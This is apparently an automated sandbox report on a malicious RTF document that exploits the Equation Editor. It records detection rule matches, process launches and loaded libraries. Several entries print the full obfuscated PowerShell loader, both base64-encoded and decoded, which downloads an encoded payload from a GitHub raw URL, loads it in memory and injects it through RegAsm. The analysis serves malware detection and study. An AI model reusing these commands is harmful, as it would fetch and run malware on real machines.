Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.386921260.0000000002367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.380604266.0000000002341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.380604266.000000000247A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000008.00000002.380604266.000000000247A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.385304370.0000000004F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000008.00000002.380604266.000000000247A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtgzJ;
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164

System Summary

barindex
Source: IpEmBW3Qw5.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3652, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002B423B2_2_002B423B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002B97182_2_002B9718
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002B7B102_2_002B7B10
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002BBDFC2_2_002BBDFC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002B7ACC2_2_002B7ACC
Source: ~WRF{D2609696-E762-447B-A02C-A86155954B70}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: IpEmBW3Qw5.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3652, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
Source: classification engineClassification label: mal100.expl.evad.winRTF@8/18@1/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$EmBW3Qw5.rtfJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR82E5.tmpJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................<:.........................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................H:.........................s............8...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................e.r.r.o.r.:. .(.4.0.4.). .N.o.t. .F.o.u.n.d..."....................s............8.......0.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................f:.........................s............8...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.9.8.....x:.........................s............8.......$.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............8...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............8...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............8...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............8...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s....................T.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................;.........................s............8...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................@........;.........................s............8...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@.......#;.........................s............8...............................Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: IpEmBW3Qw5.rtfReversingLabs: Detection: 50%
Source: IpEmBW3Qw5.rtfVirustotal: Detection: 63%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )"Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
